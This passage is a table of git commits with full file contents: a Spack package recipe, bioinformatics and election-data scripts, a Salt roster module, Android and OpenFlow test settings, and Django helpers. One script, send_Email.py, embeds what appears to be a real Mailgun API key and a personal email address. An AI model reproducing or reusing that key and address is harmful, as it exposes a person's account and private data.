commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
f363864f7f6ad9da45cb3053816d500838821a27 | add new package (#27093) | var/spack/repos/builtin/packages/r-posterior/package.py | var/spack/repos/builtin/packages/r-posterior/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RPosterior(RPackage):
"""Tools for Working with Posterior Distributions.
Provides useful tools for both users and developers of packages for
fitting Bayesian models or working with output from Bayesian models. The
primary goals of the package are to: (a) Efficiently convert between many
different useful formats of draws (samples) from posterior or prior
distributions. (b) Provide consistent methods for operations commonly
performed on draws, for example, subsetting, binding, or mutating draws.
(c) Provide various summaries of draws in convenient formats. (d) Provide
lightweight implementations of state of the art posterior inference
diagnostics. References: Vehtari et al. (2021) <doi:10.1214/20-BA1221>."""
homepage = "https://mc-stan.org/posterior/"
cran = "posterior"
version('1.1.0', sha256='eff6262dbcc1bf18337f535b0c75ba2fe360322e8b170c466e24ed3ee76cf4d2')
depends_on('r@3.2.0:', type=('build', 'run'))
depends_on('r-abind', type=('build', 'run'))
depends_on('r-checkmate', type=('build', 'run'))
depends_on('r-rlang@0.4.7:', type=('build', 'run'))
depends_on('r-tibble@3.0.0:', type=('build', 'run'))
depends_on('r-vctrs', type=('build', 'run'))
depends_on('r-tensora', type=('build', 'run'))
depends_on('r-pillar', type=('build', 'run'))
depends_on('r-distributional', type=('build', 'run'))
depends_on('r-matrixstats', type=('build', 'run'))
| Python | 0 | |
64f6aee62637336f8c4f9fbf4170e4415300ffc4 | Create differential_expression_genes.py | Differential_expression/differential_expression_genes.py | Differential_expression/differential_expression_genes.py | #!/usr/bin/env python
# dealing with command line input
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t",type=int, default=0)
parser.add_argument("-above_threshold", nargs="+", type=str)
parser.add_argument("-absent", nargs="+", type=str)
parser.add_argument("-other", nargs="+", type=str)
parser.add_argument("-t_absent", type=int, default=0)
parser.add_argument("-expression", type=str)
args = parser.parse_args()
threshold = args.t
above_threshold = args.above_threshold
absent = args.absent
other = args.other
absent_threshold = args.t_absent
expression = args.expression
# making lists of genes with expression above threshold in above_threshold samples
initial_genes = []
initial_annotation_IDs = []
initial_loci = []
delimiter = '\t'
for sample in above_threshold:
gene_list = []
locus_list = []
annotation_ID_list = []
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
annotation_ID = split[2]
locus = split[3]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample1_expression = float(sample1_expression)
sample2_expression = split[8]
sample2_expression = float(sample2_expression)
if (sample1 == sample and sample1_expression > threshold) or (sample2 == sample and sample2_expression > threshold):
if gene not in gene_list:
gene_list.append(gene)
locus_list.append(locus)
annotation_ID_list.append(annotation_ID)
file.close()
initial_genes.append(gene_list)
initial_annotation_IDs.append(annotation_ID_list)
initial_loci.append(locus_list)
# making lists of genes with no expression in absent samples
for sample in absent:
gene_list = []
file = open(expression)
file.readline()
for line in file:
split = line.rstrip().split(delimiter)
gene = split[0]
annotation_ID = split[2]
locus = split[3]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample1_expression = float(sample1_expression)
sample2_expression = split[8]
sample2_expression = float(sample2_expression)
if (sample1 == sample and sample1_expression <= absent_threshold) or (sample2 == sample and sample2_expression <= absent_threshold):
if gene not in gene_list:
gene_list.append(gene)
locus_list.append(locus)
annotation_ID_list.append(annotation_ID)
file.close()
initial_genes.append(gene_list)
# extracting genes in all lists
final_genes = []
final_loci = []
final_annotation_IDs = []
sample_number = len(initial_genes)
initial_gene_list = initial_genes[0]
initial_loci_list = initial_loci[0]
initial_annotation_IDs_list = initial_annotation_IDs[0]
for gene in initial_gene_list:
count = 0
for list in initial_genes:
if gene in list:
count = count + 1
if count == sample_number:
final_genes.append(gene)
final_annotation_IDs.append(initial_annotation_IDs_list[initial_gene_list.index(gene)])
final_loci.append(initial_loci_list[initial_gene_list.index(gene)])
# writing file headers
output = open('gene_expression_profiles.txt', 'w')
output.write('Locus\tAnnotation gene ID\tCuffdiff gene ID\t')
for sample in above_threshold:
output.write(sample + '\t')
if other:
for sample in other:
output.write(sample + '\t')
for sample in absent:
output.write(sample + '\t')
output.write('\n')
# writing expression values
for final_gene in final_genes:
annotation_ID = final_annotation_IDs[final_genes.index(final_gene)]
locus = final_loci[final_genes.index(final_gene)]
output.write(locus + '\t' + annotation_ID + '\t' + final_gene + '\t')
for sample in above_threshold:
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample2_expression = split[8]
if sample1 == sample and gene == final_gene:
output.write(sample1_expression + '\t')
break
elif sample2 == sample and gene == final_gene:
output.write(sample2_expression + '\t')
break
file.close()
if other:
for sample in other:
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample2_expression = split[8]
if sample1 == sample and gene == final_gene:
output.write(sample1_expression + '\t')
break
elif sample2 == sample and gene == final_gene:
output.write(sample2_expression + '\t')
break
file.close()
for sample in absent:
file = open(expression)
file.readline()
for line in file:
split = line.split(delimiter)
gene = split[0]
sample1 = split[4]
sample2 = split[5]
sample1_expression = split[7]
sample2_expression = split[8]
if sample1 == sample and gene == final_gene:
output.write(sample1_expression + '\t')
break
elif sample2 == sample and gene == final_gene:
output.write(sample2_expression + '\t')
break
output.write('\n')
output.close()
| Python | 0.998909 | |
1596d091183d89c703e67555e81f24722dc0d8a2 | add import script for Chelmsford | polling_stations/apps/data_collection/management/commands/import_chelmsford.py | polling_stations/apps/data_collection/management/commands/import_chelmsford.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = 'E07000070'
addresses_name = 'Democracy_Club__04May2017 (1).tsv'
stations_name = 'Democracy_Club__04May2017 (1).tsv'
elections = ['local.essex.2017-05-04']
csv_delimiter = '\t'
csv_encoding = 'latin-1'
| Python | 0 | |
94e83a48d3700cdc7c9bb6bd9a14860d2665c655 | Add custom roster module | _modules/roster.py | _modules/roster.py | # import python libraries
import logging
# import salt libraries
import salt.utils.files
import salt.utils.yaml
log = logging.getLogger(__name__)
def remove(roster, name):
'''
remove an entry from the salt-ssh roster
'''
with salt.utils.files.fopen(roster, 'r') as conf:
roster_txt = conf.read()
roster_yaml = salt.utils.yaml.safe_load(roster_txt)
try:
del roster_yaml[name]
except KeyError:
log.error('{0} does not exist in roster file {1}'.format(name, roster))
return False
try:
with salt.utils.files.fopen(roster, 'w+') as conf:
salt.utils.yaml.safe_dump(roster_yaml, conf, default_flow_style=False)
except (IOError, OSError):
log.error('Unable to delete {0} from roster file {1}'.format(name, roster))
return False
| Python | 0 | |
8a043a2d3a9517c5eb84aea3e9916419f6136e23 | Add tests for IndexAbstractor. | test/lib/indexabstractor.py | test/lib/indexabstractor.py | """ The PyUnit test framework for the indexabstractor. """
import unittest
from lib import parser
from lib.indexabstractor import *
class indexTestCase(unittest.TestCase):
def setUp(self):
self.sumo = parser.Ontology('data/Merge.kif', name='SUMO')
self.kif = parser.kifparse(self.sumo)
self.indexabstractor = IndexAbstractor()
def test0Normalize(self):
self.assertEqual(normalize('t.erm '), 'term')
self.assertEqual(normalize(' TeRM '), 'term')
self.assertNotEqual(normalize('t erm '), 'term')
def test1BuildIndex(self):
self.indexabstractor.update_index(self.kif)
self.assertEqual(self.indexabstractor.ontologies, {self.sumo})
self.assertEqual(self.indexabstractor.root, self.kif)
assert self.sumo in self.indexabstractor.index
def test2Search(self):
self.maxDiff = None
self.indexabstractor.update_index(self.kif)
self.assertEqual(self.indexabstractor.search('Plasma'),
self.indexabstractor.search('plasma'))
self.assertEqual(self.indexabstractor.search('ValidDeductiveArgument'),
self.indexabstractor.search(' valIddedUctiVeargument '))
self.assertNotEqual(self.indexabstractor.search('ValidDeductiveArgument'),
self.indexabstractor.search('InvalidDeductiveArgument'))
result = self.indexabstractor.search(' ContentbearingObJect')
assert self.sumo in result
definition = result[self.sumo]
self.assertEqual(sorted(definition),
sorted(['( relatedInternalConcept ContentBearingObject containsInformation )',
'( subclass ContentBearingObject CorpuscularObject )',
'( subclass ContentBearingObject ContentBearingPhysical )',
'( documentation ContentBearingObject EnglishLanguage "Any &%SelfConnectedObject that expressescontent. This content may be a &%Proposition, e.g. when the &%ContentBearingObjectis a &%Sentence or &%Text, or it may be a representation of an abstract orphysical object, as with an &%Icon, a &%Word or a &%Phrase." )']))
indexTestSuit = unittest.makeSuite(indexTestCase, 'test')
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(indexTestSuit)
| Python | 0 | |
58de77d09564a43ae1934e2cee4543bc028c25c6 | Make android bot configuration more consistent. | build/android/pylib/device_settings.py | build/android/pylib/device_settings.py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from pylib import content_settings
def ConfigureContentSettingsDict(device, desired_settings):
"""Configures device content setings from a dictionary.
Many settings are documented at:
http://developer.android.com/reference/android/provider/Settings.Global.html
http://developer.android.com/reference/android/provider/Settings.Secure.html
http://developer.android.com/reference/android/provider/Settings.System.html
Many others are undocumented.
Args:
device: A DeviceUtils instance for the device to configure.
desired_settings: A dict of {table: {key: value}} for all
settings to configure.
"""
try:
sdk_version = int(device.old_interface.system_properties[
'ro.build.version.sdk'])
except ValueError:
logging.error('Skipping content settings configuration, unknown sdk %s',
device.old_interface.system_properties[
'ro.build.version.sdk'])
return
if sdk_version < 16:
logging.error('Skipping content settings configuration due to outdated sdk')
return
for table, key_value in sorted(desired_settings.iteritems()):
settings = content_settings.ContentSettings(table, device)
for key, value in key_value.iteritems():
settings[key] = value
logging.info('\n%s %s', table, (80 - len(table)) * '-')
for key, value in sorted(settings.iteritems()):
logging.info('\t%s: %s', key, value)
DETERMINISTIC_DEVICE_SETTINGS = {
'com.google.settings/partner': {
'network_location_opt_in': 0,
'use_location_for_services': 1,
},
'settings/global': {
'assisted_gps_enabled': 0,
# Disable "auto time" and "auto time zone" to avoid network-provided time
# to overwrite the device's datetime and timezone synchronized from host
# when running tests later. See b/6569849.
'auto_time': 0,
'auto_time_zone': 0,
'development_settings_enabled': 1,
# Flag for allowing ActivityManagerService to send ACTION_APP_ERROR intents
# on application crashes and ANRs. If this is disabled, the crash/ANR dialog
# will never display the "Report" button.
# Type: int ( 0 = disallow, 1 = allow )
'send_action_app_error': 0,
'stay_on_while_plugged_in': 3,
'verifier_verify_adb_installs' : 0,
},
'settings/secure': {
'allowed_geolocation_origins':
'http://www.google.co.uk http://www.google.com',
# Ensure that we never get random dialogs like "Unfortunately the process
# android.process.acore has stopped", which steal the focus, and make our
# automation fail (because the dialog steals the focus then mistakenly
# receives the injected user input events).
'anr_show_background': 0,
# Ensure Geolocation is enabled and allowed for tests.
'location_providers_allowed': 'gps,network',
'lockscreen.disabled': 1,
'screensaver_enabled': 0,
},
'settings/system': {
# Don't want devices to accidentally rotate the screen as that could
# affect performance measurements.
'accelerometer_rotation': 0,
'lockscreen.disabled': 1,
# Turn down brightness and disable auto-adjust so that devices run cooler.
'screen_brightness': 5,
'screen_brightness_mode': 0,
'user_rotation': 0,
},
}
NETWORK_DISABLED_SETTINGS = {
'settings/global': {
'airplane_mode_on': 1,
'wifi_on': 0,
},
}
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from pylib import content_settings
def ConfigureContentSettingsDict(device, desired_settings):
"""Configures device content setings from a dictionary.
Many settings are documented at:
http://developer.android.com/reference/android/provider/Settings.Global.html
http://developer.android.com/reference/android/provider/Settings.Secure.html
http://developer.android.com/reference/android/provider/Settings.System.html
Many others are undocumented.
Args:
device: A DeviceUtils instance for the device to configure.
desired_settings: A dict of {table: {key: value}} for all
settings to configure.
"""
try:
sdk_version = int(device.old_interface.system_properties[
'ro.build.version.sdk'])
except ValueError:
logging.error('Skipping content settings configuration, unknown sdk %s',
device.old_interface.system_properties[
'ro.build.version.sdk'])
return
if sdk_version < 16:
logging.error('Skipping content settings configuration due to outdated sdk')
return
for table, key_value in sorted(desired_settings.iteritems()):
settings = content_settings.ContentSettings(table, device)
for key, value in key_value.iteritems():
settings[key] = value
logging.info('\n%s %s', table, (80 - len(table)) * '-')
for key, value in sorted(settings.iteritems()):
logging.info('\t%s: %s', key, value)
DETERMINISTIC_DEVICE_SETTINGS = {
'com.google.settings/partner': {
'use_location_for_services': 1,
},
'settings/global': {
# Disable "auto time" and "auto time zone" to avoid network-provided time
# to overwrite the device's datetime and timezone synchronized from host
# when running tests later. See b/6569849.
'auto_time': 0,
'auto_time_zone': 0,
'stay_on_while_plugged_in': 3,
'verifier_verify_adb_installs' : 0,
},
'settings/secure': {
# Ensure that we never get random dialogs like "Unfortunately the process
# android.process.acore has stopped", which steal the focus, and make our
# automation fail (because the dialog steals the focus then mistakenly
# receives the injected user input events).
'anr_show_background': 0,
# Ensure Geolocation is enabled and allowed for tests.
'location_providers_allowed': 'gps,network',
'lockscreen.disabled': 1,
'screensaver_enabled': 0,
},
'settings/system': {
# Don't want devices to accidentally rotate the screen as that could
# affect performance measurements.
'accelerometer_rotation': 0,
'lockscreen.disabled': 1,
# Turn down brightness and disable auto-adjust so that devices run cooler.
'screen_brightness': 5,
'screen_brightness_mode': 0,
'user_rotation': 0,
},
}
NETWORK_DISABLED_SETTINGS = {
'settings/global': {
'airplane_mode_on': 1,
},
}
| Python | 0.000423 |
859d1031bc61cd4466953cbc7a5e282abff35e50 | Create database.py | database.py | database.py | Python | 0.000001 | ||
c8d57138240e87c802b84cf0b2b01efd01c80e41 | Create solution.py | hackerrank/algorithms/implementation/easy/angry_professor/py/solution.py | hackerrank/algorithms/implementation/easy/angry_professor/py/solution.py | #!/bin/python3
import sys
def isClassCancelled(arrivalTimes, cancellationThreshold):
count = 0
for arrivalTime in arrivalTimes:
if arrivalTime <= 0:
count += 1
return count < cancellationThreshold
t = int(input())
for a0 in range(t):
n, k = map(int, input().split())
a = tuple(map(int, input().split()))
if isClassCancelled(a, k):
print('YES')
else:
print('NO')
| Python | 0.000018 | |
02183bdcd1b3e4109568f5077a6074573bbd8bf9 | Add send_unsent.py. | send_unsent.py | send_unsent.py | #!/usr/bin/env python2
# -*- coding: utf8 -*-
import smtplib
import enseigner.model as model
import enseigner.emails as emails
mails = model.Mail.all_unsent()
yesno = raw_input(u'Envoyer %d mails ? ' % len(mails))
if yesno != 'yes':
exit(0)
sender = emails.Sender()
errors = []
for mail in mails:
try:
sender.send(mail.recipient, mail.subject, mail.content)
except smtplib.SMTPException as e:
errors.append((mail, e))
else:
mail.set_sent()
print(repr(errors))
with open('/tmp/enseigner_errors.txt', 'a') as fd:
for error in errors:
fd.write('\n\n')
fd.write(repr(error))
| Python | 0 | |
eee8b3e96f7b0c9f24e7c43483bb6d74bd8a490a | add proto | servy/proto.py | servy/proto.py | import json
class Response(object):
@classmethod
def encode(cls, content):
return json.dumps(content)
@classmethod
def decode(cls, content):
return json.loads(content)
class Request(object):
@classmethod
def encode(cls, proc, args, kw):
return json.dumps({
'proc': proc,
'args': args,
'kw': kw,
})
@classmethod
def decode(cls, content):
content = json.loads(content)
return (
content['proc'],
content['args'],
content['kw'],
)
| Python | 0.000006 | |
6f8d2e724f4aafb6b8295b8b0a1f915d5f21fa38 | fix script | tests/scripts/makereport.py | tests/scripts/makereport.py | # accepts 0,1, or 2 arguments. If a string starting with a number is handed in, it is assumed to be a subdirectory of the current directory to run on. If not specified, the newest build is used. Any other string is taken as the branch name for this test (or treated as mainline). Order of the arguments does not matter.
# for questions: Timo Heister
import xml.etree.ElementTree as ET
import glob
import sys
from datetime import datetime
import subprocess
class Group:
def __init__(self, name):
self.name = name
self.n_tests = 0
self.n_fail = 0
self.fail = []
self.fail_text = {}
class Revision:
def __init__(self):
self.groups = {}
self.number = -1
self.name = ''
self.n_tests = 0
self.n_fail = 0
branch=''
args=sys.argv
args.pop(0)
dirname=""
while len(args)>0:
if args[0].startswith("20"): #I hope this script is not used in the year 2100
dirname=args[0].replace('/','')
else:
branch=args[0].replace('/','')+'/'
args.pop(0)
if dirname=="":
n=glob.glob("*/Build.xml")
n.sort(reverse=True)
dirname = n[0].replace('/Build.xml','')
if len(glob.glob(dirname+'/Update.xml'))>0:
#new format
tree = ET.parse(dirname+'/Update.xml')
name = tree.getroot().find('BuildName').text
number = tree.getroot().find('Revision').text
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
else:
#old format
tree = ET.parse(dirname+'/Notes.xml')
name = tree.getroot().attrib['BuildName']
number = name.split('-')[-1]
number = number[1:]
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
header = "Revision: %s"%number + "\n"
header += "Date: %s"%(date.strftime("%Y %j %F %U-%w")) + '\n'
id = subprocess.check_output(["id","-un"])+'@'+subprocess.check_output(["hostname"])
id=id.replace('\n','')
header += "Id: %s"%id
#now Test.xml:
tree = ET.parse(dirname+'/Test.xml')
root = tree.getroot()
testing = root.find('Testing')
tests={}
for test in testing.findall("Test"):
status = test.attrib['Status']
fail=False
if status=="failed": fail=True
name = test.find('Name').text
group = name.split('/')[0]
if fail:
line = "%s 3 %s%s"%(date,branch,name)
else:
line = "%s + %s%s"%(date,branch,name)
if group not in tests: tests[group]=[]
tests[group].append( line )
for g in sorted(tests):
group = tests[g]
print header
for l in group:
print l
| # accepts 0,1, or 2 arguments. If a string starting with a number is handed in, it is assumed to be a subdirectory of the current directory to run on. If not specified, the newest build is used. Any other string is taken as the branch name for this test (or treated as mainline). Order of the arguments does not matter.
# for questions: Timo Heister
import xml.etree.ElementTree as ET
import glob
import sys
from datetime import datetime
import subprocess
class Group:
def __init__(self, name):
self.name = name
self.n_tests = 0
self.n_fail = 0
self.fail = []
self.fail_text = {}
class Revision:
def __init__(self):
self.groups = {}
self.number = -1
self.name = ''
self.n_tests = 0
self.n_fail = 0
branch=''
args=sys.argv
args.pop(0)
dirname=""
while len(args)>0:
if args[0].startswith("20"): #I hope this script is not used in the year 2100
dirname=args[0].replace('/','')
else:
branch=args[0].replace('/','')+'/'
args.pop(0)
if len(glob.glob(dirname+'/Update.xml'))>0:
#new format
tree = ET.parse(dirname+'/Update.xml')
name = tree.getroot().find('BuildName').text
number = tree.getroot().find('Revision').text
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
else:
#old format
tree = ET.parse(dirname+'/Notes.xml')
name = tree.getroot().attrib['BuildName']
number = name.split('-')[-1]
number = number[1:]
date = datetime.strptime(dirname,"%Y%m%d-%H%M")
header = "Revision: %s"%number + "\n"
header += "Date: %s"%(date.strftime("%Y %j %F %U-%w")) + '\n'
id = subprocess.check_output(["id","-un"])+'@'+subprocess.check_output(["hostname"])
id=id.replace('\n','')
header += "Id: %s"%id
#now Test.xml:
tree = ET.parse(dirname+'/Test.xml')
root = tree.getroot()
testing = root.find('Testing')
tests={}
for test in testing.findall("Test"):
status = test.attrib['Status']
fail=False
if status=="failed": fail=True
name = test.find('Name').text
group = name.split('/')[0]
if fail:
line = "%s 3 %s%s"%(date,branch,name)
else:
line = "%s + %s%s"%(date,branch,name)
if group not in tests: tests[group]=[]
tests[group].append( line )
for g in sorted(tests):
group = tests[g]
print header
for l in group:
print l
| Python | 0.000003 |
339bb5cd325c7b9c08b8a43994f55bbe1756fbde | validate redirect | signup/auth.py | signup/auth.py | # Copyright (c) 2014, Fortylines LLC
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import urlparse
from django.conf import settings
from django.http.request import split_domain_port, validate_host
def validate_redirect_url(next_url):
"""
Returns the next_url path if next_url matches allowed hosts.
"""
if not next_url:
return None
parts = urlparse.urlparse(next_url)
if parts.netloc:
domain, port = split_domain_port(parts.netloc)
allowed_hosts = ['*'] if settings.DEBUG else settings.ALLOWED_HOSTS
if not (domain and validate_host(domain, allowed_hosts)):
return None
return parts.path
| Python | 0.000001 | |
c6e85e35a090c33bc1d6813dce959c8d47588ae8 | send an email with current IP address | send_Email.py | send_Email.py | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 16 12:14:51 2017
@author: smrak
"""
import requests
import urllib3
from datetime import datetime
def getIP():
"""
Sebastijan Mrak:
get & reteurn a public IP address
"""
http = urllib3.PoolManager()
r = http.request('GET', 'http://ip.42.pl/raw')
my_ip = r.data.decode('utf-8')
return my_ip
def send_simple_message(dev_name, ip):
dt = datetime.utcnow()
time = dt.strftime("%d-%m %H:%M")
return requests.post(
"https://api.mailgun.net/v3/sandbox1b5516af304e4d3bbb4ce505c254cbca.mailgun.org/messages",
auth=("api", "key-6e8d2a811ff2ea98114574c72dc988f6"),
data={"from": "Mailgun Sandbox <postmaster@sandbox1b5516af304e4d3bbb4ce505c254cbca.mailgun.org>",
"to": "Sebastijan <sebastijan.mrak@gmail.com>",
"subject": "Current IP address for device: " + dev_name,
"text": "IP address at a time "+str(time)+" is: "+str(ip)})
ip = getIP()
#print (ip)
send_simple_message('PC1', ip) | Python | 0 | |
c13968125383581e67804e11bc430391d355145a | Create DataStreamasDisjointIntervals.py | leetcode/352-Data-Stream-as-Disjoint-Intervals/DataStreamasDisjointIntervals.py | leetcode/352-Data-Stream-as-Disjoint-Intervals/DataStreamasDisjointIntervals.py | # Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
class SummaryRanges(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.intervals = []
def addNum(self, val):
"""
:type val: int
:rtype: void
"""
intv = self.intervals
l, r = 0, len(self.intervals) - 1
print val
while l <= r:
m = l + (r - l) / 2
if val < intv[m].start:
r = m - 1
elif val <= intv[m].end:
break
else:
l = m + 1
if l > r:
if 1 <= l < len(intv) and intv[l - 1].end + 1 == val and intv[l].start - 1 == val:
intv[l - 1].end = intv[l].end
intv.pop(l)
elif len(intv) > l and intv[l].start - 1 == val:
intv[l].start = val
elif l > 0 and intv[l - 1].end + 1 == val:
intv[l - 1].end = val
else:
intv.insert(l, Interval(val, val))
def getIntervals(self):
"""
:rtype: List[Interval]
"""
return self.intervals
# Your SummaryRanges object will be instantiated and called as such:
# obj = SummaryRanges()
# obj.addNum(val)
# param_2 = obj.getIntervals()
| Python | 0 | |
435220dda7eb928d9d959594d7986136f17da973 | Add actual url patter for #239 | popit/urls/rooturls.py | popit/urls/rooturls.py | from django.conf.urls import url
from popit.views import *
urlpatterns = [
url(r'^(?P<language>\w{2})', api_root, name="api-root"),
url(r'^$', api_root_all),
]
| Python | 0.000002 | |
f955620fb2cb12f14c38ad196d99ae12d5b9c1ff | add default openflow test settings | src/python/expedient/clearinghouse/defaultsettings/openflowtests.py | src/python/expedient/clearinghouse/defaultsettings/openflowtests.py | '''Contains default settings for the testing environment.
Created on Aug 22, 2010
@author: jnaous
'''
from os.path import join, dirname
PYTHON_DIR = join(dirname(__file__), "../../..")
OM_PROJECT_DIR = join(PYTHON_DIR, "openflow/optin_manager")
CH_PROJECT_DIR = join(PYTHON_DIR, "expedient/clearinghouse")
GCF_DIR = join(PYTHON_DIR, "gcf")
SSL_DIR = join(dirname(__file__), "ssl")
FLOWVISOR_DIR = join(PYTHON_DIR, "../../../../flowvisor")
'''Location of the testing Flowvisor source directory.'''
USE_RANDOM = False
'''Randomize the tests where possible?'''
SITE_IP_ADDR = '192.168.126.128'
'''The IP address of the host where Expedient and the OM are running.'''
OM_PORT = 8443
'''Port on which the Opt-In manager is running.'''
CH_PORT = 443
'''Port on which Expedient is running.'''
PREFIX = ""
FV_CONFIG = 'fv_vm_config.xml'
'''Name of the Flowvisor config file.'''
GCH_PORT = 8001
'''The port on which the GENI Clearinghouse should run.'''
FLOWVISORS = [
dict(
of_port=6633, # openflow port
xmlrpc_port=8080, # XMLRPC port for the flowvisor
username="root", # The username to use to connect to the FV
password='rootpassword', # The password to use to connect to the FV
path=(FLOWVISOR_DIR, FV_CONFIG), # configuration file
),
]
'''Information about where the test flowvisor should run.
This should be a list of dicts with the following keys:
* C{of_port}: The openflow port number the Flowvisor will use.
* C{xmlrpc_port}: The port number for XMLRPC calls to the Flowvisor.
* C{username}: The username to use for accessing the xmlrpc calls.
* C{password}: The password to use for accessing the xmlrpc calls.
* C{path}: The location of the flowvisor config file.
'''
MININET_VMS = [('172.16.77.131', 22)]
'''Information about where the Mininet VM is running.
This should be a list of tuples (IP address, SSH port number)
'''
MININET_SWITCH_TYPE = "user"
'''Type of switch to use. One of "user", "ovsk", "kernel"'''
NUM_EXPERIMENTS = 2
'''Number of Slices to instantiate during testing.'''
NUM_DUMMY_OMS = 3
'''Number of Dummy OMs to use for GAPI tests.'''
NUM_SWITCHES_PER_AGG = 10
'''Number of dummy switches for GAPI tests.'''
NUM_LINKS_PER_AGG = 20
'''Number of dummy links for GAPI tests.'''
NUM_DUMMY_FVS = 1
'''Don't change. Num of Dummy FVs for OM tests.'''
USE_HTTPS = True
'''Run using HTTPS or HTTP to expedient & OM?'''
SHOW_PROCESSES_IN_XTERM = True
'''Don't change. Should forked processes run in an xterm?'''
PAUSE_AFTER_TESTS = False
'''If true, each test will wait for an Enter from the user
before tearing down (useful to look at xterm output).
'''
TIMEOUT = 20
'''Time to wait for processes to run and for communication to work.'''
# basic settings sanity checks
assert(len(FLOWVISORS) == len(MININET_VMS))
| Python | 0 | |
f04f7555b06f5087100b336f3127b19e252b3794 | Fix issue 137 | pages/http.py | pages/http.py | """Page CMS functions related to the request object."""
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import loader, Context, RequestContext
from django.core.urlresolvers import reverse
from pages import settings
def get_request_mock():
"""Build a request mock that can be used for testing."""
bh = BaseHandler()
bh.load_middleware()
request = WSGIRequest({
'REQUEST_METHOD': 'GET',
'SERVER_NAME': 'test',
'SERVER_PORT': '8000',
'HTTP_HOST': 'testhost',
})
# Apply request middleware
for middleware_method in bh._request_middleware:
# LocaleMiddleware should never be applied a second time because
# it would broke the current real request language
if 'LocaleMiddleware' not in str(middleware_method.im_class):
response = middleware_method(request)
return request
class AutoRenderHttpError(Exception):
"""Cannot return context dictionary because a view returned an HTTP
response when a (template_name, context) tuple was expected."""
pass
def auto_render(func):
"""
This view decorator automatically calls the ``render_to_response``
shortcut. A view that use this decorator should return a tuple of this
form : (template name, context) instead of a ``HttpRequest`` object.
"""
def _dec(request, *args, **kwargs):
template_override = kwargs.pop('template_name', None)
only_context = kwargs.pop('only_context', False)
if only_context:
# return only context dictionary
response = func(request, *args, **kwargs)
if isinstance(response, HttpResponse):
raise AutoRenderHttpError
(template_name, context) = response
return context
response = func(request, *args, **kwargs)
if isinstance(response, HttpResponse):
return response
(template_name, context) = response
t = context['template_name'] = template_override or template_name
return render_to_response(t, context,
context_instance=RequestContext(request))
return _dec
def get_slug_and_relative_path(path):
"""Return the page's slug and relative path."""
root = reverse('pages-root')
if path.startswith(root):
path = path[len(root):]
if len(path) and path[-1] == '/':
path = path[:-1]
slug = path.split("/")[-1]
lang = None
if settings.PAGE_USE_LANGUAGE_PREFIX:
lang = path.split("/")[0]
path = path[(len(lang) + 1):]
return slug, path, lang
def get_template_from_request(request, page=None):
"""
Gets a valid template from different sources or falls back to the
default template.
"""
if settings.PAGE_TEMPLATES is None:
return settings.DEFAULT_PAGE_TEMPLATE
template = request.REQUEST.get('template', None)
if template is not None and \
(template in dict(settings.PAGE_TEMPLATES).keys() or
template == settings.DEFAULT_PAGE_TEMPLATE):
return template
if page is not None:
return page.get_template()
return settings.DEFAULT_PAGE_TEMPLATE
def get_language_from_request(request):
"""Return the most obvious language according the request."""
language = request.GET.get('language', None)
if language:
return language
if hasattr(request, 'LANGUAGE_CODE'):
return settings.PAGE_LANGUAGE_MAPPING(str(request.LANGUAGE_CODE))
else:
return settings.PAGE_DEFAULT_LANGUAGE
| """Page CMS functions related to the request object."""
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest
from django.http import HttpResponse, HttpResponseRedirect
